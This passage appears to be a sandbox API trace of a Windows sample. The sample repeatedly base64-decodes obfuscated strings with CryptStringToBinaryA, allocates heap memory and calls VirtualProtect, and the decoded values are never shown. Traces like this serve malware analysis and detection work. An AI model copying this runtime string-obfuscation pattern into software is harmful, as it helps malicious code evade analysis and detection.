[0181.000] CryptStringToBinaryA (in: pszString="dgGFUqHISA==", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.000] CryptStringToBinaryA (in: pszString="dgGFUqHISA==", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.000] GetProcessHeap () returned 0x5b0000 [0181.000] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b7d88 [0181.000] VirtualProtect (in: lpAddress=0x5b7d88, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.000] GetProcessHeap () returned 0x5b0000 [0181.000] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x8) returned 0x5b3ff0 [0181.000] CryptStringToBinaryA (in: pszString="KULfEKnVSXoTc3+k", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.000] CryptStringToBinaryA (in: pszString="KULfEKnVSXoTc3+k", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.000] GetProcessHeap () returned 0x5b0000 [0181.001] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b7e98 [0181.001] VirtualProtect (in: lpAddress=0x5b7e98, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.001] GetProcessHeap () returned 0x5b0000 [0181.001] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xd) returned 0x5b3f08 [0181.001] CryptStringToBinaryA (in: pszString="MRKeTf+JAjlSczb+bQ==", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.001] CryptStringToBinaryA (in: pszString="MRKeTf+JAjlSczb+bQ==", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.001] GetProcessHeap () returned 0x5b0000 [0181.001] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b7fa8 [0181.001] VirtualProtect (in: lpAddress=0x5b7fa8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.001] GetProcessHeap () returned 0x5b0000 [0181.001] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xe) returned 0x5b3f20 [0181.001] CryptStringToBinaryA (in: pszString="WhCXQ+6LEw==", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.001] CryptStringToBinaryA (in: pszString="WhCXQ+6LEw==", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.001] GetProcessHeap () returned 0x5b0000 [0181.001] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b80b8 [0181.001] VirtualProtect (in: lpAddress=0x5b80b8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.002] GetProcessHeap () returned 0x5b0000 [0181.002] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x8) returned 0x5b3528 [0181.002] CryptStringToBinaryA (in: pszString="Ox2EDb6PEmEENTO2OMHZYH4xP4GI3Bw=", cchString=0x20, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.002] CryptStringToBinaryA (in: pszString="Ox2EDb6PEmEENTO2OMHZYH4xP4GI3Bw=", cchString=0x20, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.002] GetProcessHeap () returned 0x5b0000 [0181.002] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b81c8 [0181.002] VirtualProtect (in: lpAddress=0x5b81c8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.002] GetProcessHeap () returned 0x5b0000 [0181.002] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x18) returned 0x5b4018 [0181.002] CryptStringToBinaryA (in: pszString="cQWUTA==", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.002] CryptStringToBinaryA (in: pszString="cQWUTA==", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.002] GetProcessHeap () returned 0x5b0000 [0181.002] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b82d8 [0181.002] VirtualProtect (in: lpAddress=0x5b82d8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.003] GetProcessHeap () returned 0x5b0000 [0181.003] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x5) returned 0x5b28b8 [0181.003] CryptStringToBinaryA (in: pszString="MQWEQPeOBGFSLCr/acyfdD81Jg==", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.003] CryptStringToBinaryA (in: pszString="MQWEQPeOBGFSLCr/acyfdD81Jg==", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.003] GetProcessHeap () returned 0x5b0000 [0181.003] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b83e8 [0181.003] VirtualProtect (in: lpAddress=0x5b83e8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.003] GetProcessHeap () returned 0x5b0000 [0181.003] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x14) returned 0x5b4038 [0181.003] CryptStringToBinaryA (in: pszString="XU+tcumIZzxAMAL3acjwKSo1I8/Ih0fQf+g=", cchString=0x24, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.003] CryptStringToBinaryA (in: pszString="XU+tcumIZzxAMAL3acjwKSo1I8/Ih0fQf+g=", cchString=0x24, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.003] GetProcessHeap () returned 0x5b0000 [0181.003] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b84f8 [0181.003] VirtualProtect (in: lpAddress=0x5b84f8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.004] GetProcessHeap () returned 0x5b0000 [0181.004] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1b) returned 0x5b4058 [0181.004] CryptStringToBinaryA (in: pszString="MQWEQPeOBGFHLyPzf8WfdD81Jg==", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.004] CryptStringToBinaryA (in: pszString="MQWEQPeOBGFHLyPzf8WfdD81Jg==", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.004] GetProcessHeap () returned 0x5b0000 [0181.004] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b8608 [0181.004] VirtualProtect (in: lpAddress=0x5b8608, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.004] GetProcessHeap () returned 0x5b0000 [0181.004] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x14) returned 0x5b4240 [0181.004] CryptStringToBinaryA (in: pszString="XU+tcumIZzxAMAL3acjwPCk8L9nBh0fQf+g=", cchString=0x24, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.004] CryptStringToBinaryA (in: pszString="XU+tcumIZzxAMAL3acjwPCk8L9nBh0fQf+g=", cchString=0x24, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.004] GetProcessHeap () returned 0x5b0000 [0181.004] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b8718 [0181.004] VirtualProtect (in: lpAddress=0x5b8718, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.004] GetProcessHeap () returned 0x5b0000 [0181.005] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1b) returned 0x5b4260 [0181.005] CryptStringToBinaryA (in: pszString="MQWEQPeOBGFMMjzxcdzJdD81Jg==", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.005] CryptStringToBinaryA (in: pszString="MQWEQPeOBGFMMjzxcdzJdD81Jg==", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.005] GetProcessHeap () returned 0x5b0000 [0181.005] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b8828 [0181.005] VirtualProtect (in: lpAddress=0x5b8828, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.005] GetProcessHeap () returned 0x5b0000 [0181.005] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x14) returned 0x5b4288 [0181.005] CryptStringToBinaryA (in: pszString="XU+tcumIZzxAMAL3acjwNzQjLdfY0UfQf+g=", cchString=0x24, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.005] CryptStringToBinaryA (in: pszString="XU+tcumIZzxAMAL3acjwNzQjLdfY0UfQf+g=", cchString=0x24, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.005] GetProcessHeap () returned 0x5b0000 [0181.005] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b8938 [0181.005] VirtualProtect (in: lpAddress=0x5b8938, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.005] GetProcessHeap () returned 0x5b0000 [0181.006] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1b) returned 0x5b4810 [0181.006] CryptStringToBinaryA (in: pszString="MQWEQPeOBGFMLjD1bZiYanU9Jtc=", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.006] CryptStringToBinaryA (in: pszString="MQWEQPeOBGFMLjD1bZiYanU9Jtc=", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.006] GetProcessHeap () returned 0x5b0000 [0181.006] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b8a48 [0181.006] VirtualProtect (in: lpAddress=0x5b8a48, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.006] GetProcessHeap () returned 0x5b0000 [0181.006] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x15) returned 0x5b4838 [0181.006] CryptStringToBinaryA (in: pszString="XU+tcumIZzxAMAL3acjwNygvKcucgFmad+h5", cchString=0x24, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.006] CryptStringToBinaryA (in: pszString="XU+tcumIZzxAMAL3acjwNygvKcucgFmad+h5", cchString=0x24, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.006] GetProcessHeap () returned 0x5b0000 [0181.006] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b8b58 [0181.006] VirtualProtect (in: lpAddress=0x5b8b58, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.006] GetProcessHeap () returned 0x5b0000 [0181.006] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1c) returned 0x5b4858 [0181.007] CryptStringToBinaryA (in: pszString="MQWEQPeOBGFPLjWlM83ANg==", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.007] CryptStringToBinaryA (in: pszString="MQWEQPeOBGFPLjWlM83ANg==", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.007] GetProcessHeap () returned 0x5b0000 [0181.007] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b8c68 [0181.007] VirtualProtect (in: lpAddress=0x5b8c68, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.007] GetProcessHeap () returned 0x5b0000 [0181.007] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x11) returned 0x5b3ba0 [0181.007] CryptStringToBinaryA (in: pszString="XU+tcumIZzxAMAL3acjwNCgqeZXJ2AU=", cchString=0x20, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.007] CryptStringToBinaryA (in: pszString="XU+tcumIZzxAMAL3acjwNCgqeZXJ2AU=", cchString=0x20, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.007] GetProcessHeap () returned 0x5b0000 [0181.007] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b9318 [0181.008] VirtualProtect (in: lpAddress=0x5b9318, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.008] GetProcessHeap () returned 0x5b0000 [0181.008] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x18) returned 0x5b3bc0 [0181.008] CryptStringToBinaryA (in: pszString="MQWEQPeOBGFSMiDicsLCaXU9Jtc=", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.008] CryptStringToBinaryA (in: pszString="MQWEQPeOBGFSMiDicsLCaXU9Jtc=", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.008] GetProcessHeap () returned 0x5b0000 [0181.008] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b8eb8 [0181.008] VirtualProtect (in: lpAddress=0x5b8eb8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.008] GetProcessHeap () returned 0x5b0000 [0181.008] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x15) returned 0x5b3be0 [0181.008] CryptStringToBinaryA (in: pszString="XU+tcumIZzxAMAL3acjwKTQ/PtTG2lqad+h5", cchString=0x24, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.008] CryptStringToBinaryA (in: pszString="XU+tcumIZzxAMAL3acjwKTQ/PtTG2lqad+h5", cchString=0x24, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.008] GetProcessHeap () returned 0x5b0000 [0181.008] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b9778 [0181.008] VirtualProtect (in: lpAddress=0x5b9778, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.009] GetProcessHeap () returned 0x5b0000 [0181.009] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1c) returned 0x5b3c00 [0181.009] CryptStringToBinaryA (in: pszString="MQWEQPeOBGFXPjTjc93FNz5ofouD0AXY", cchString=0x20, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.009] CryptStringToBinaryA (in: pszString="MQWEQPeOBGFXPjTjc93FNz5ofouD0AXY", cchString=0x20, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.009] GetProcessHeap () returned 0x5b0000 [0181.009] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b90e8 [0181.009] VirtualProtect (in: lpAddress=0x5b90e8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.009] GetProcessHeap () returned 0x5b0000 [0181.009] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x19) returned 0x5ba180 [0181.009] CryptStringToBinaryA (in: pszString="XU+tcumIZzxAMAL3acjwLDgrP9XZ3QTRIrAlBbmyLg==", cchString=0x2c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.009] CryptStringToBinaryA (in: pszString="XU+tcumIZzxAMAL3acjwLDgrP9XZ3QTRIrAlBbmyLg==", cchString=0x2c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.009] GetProcessHeap () returned 0x5b0000 [0181.009] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b9200 [0181.009] VirtualProtect (in: lpAddress=0x5b9200, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.009] GetProcessHeap () returned 0x5b0000 [0181.009] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x20) returned 0x5ba1a8 [0181.009] CryptStringToBinaryA (in: pszString="MA+YUg==", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.009] CryptStringToBinaryA (in: pszString="MA+YUg==", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.009] GetProcessHeap () returned 0x5b0000 [0181.010] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b9548 [0181.010] VirtualProtect (in: lpAddress=0x5b9548, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.010] GetProcessHeap () returned 0x5b0000 [0181.010] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x5) returned 0x5b4880 [0181.011] CryptStringToBinaryA (in: pszString="ShSWGLs=", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.011] CryptStringToBinaryA (in: pszString="ShSWGLs=", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.011] GetProcessHeap () returned 0x5b0000 [0181.011] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b99a8 [0181.011] VirtualProtect (in: lpAddress=0x5b99a8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.011] GetProcessHeap () returned 0x5b0000 [0181.011] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x6) returned 0x5b4080 [0181.011] CryptStringToBinaryA (in: pszString="VyXLAtK3WA==", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.011] CryptStringToBinaryA (in: pszString="VyXLAtK3WA==", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.011] GetProcessHeap () returned 0x5b0000 [0181.011] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b8da0 [0181.011] VirtualProtect (in: lpAddress=0x5b8da0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.011] GetProcessHeap () returned 0x5b0000 [0181.011] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x8) returned 0x5b4408 [0181.011] CryptStringToBinaryA (in: pszString="XRqETO+VHnQBHinjc93eI2Q=", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.011] CryptStringToBinaryA (in: pszString="XRqETO+VHnQBHinjc93eI2Q=", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.011] GetProcessHeap () returned 0x5b0000 [0181.011] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b9430 [0181.011] VirtualProtect (in: lpAddress=0x5b9430, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.012] GetProcessHeap () returned 0x5b0000 [0181.012] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x12) returned 0x5ba1d0 [0181.012] CryptStringToBinaryA (in: pszString="SRqDSfKJZ25xPDL+J4k=", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.012] CryptStringToBinaryA (in: pszString="SRqDSfKJZ25xPDL+J4k=", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.012] GetProcessHeap () returned 0x5b0000 [0181.012] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b9890 [0181.012] VirtualProtect (in: lpAddress=0x5b9890, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.012] GetProcessHeap () returned 0x5b0000 [0181.012] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xf) returned 0x5b3c28 [0181.012] CryptStringToBinaryA (in: pszString="UhqSQ/fHMydMOHy2", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, 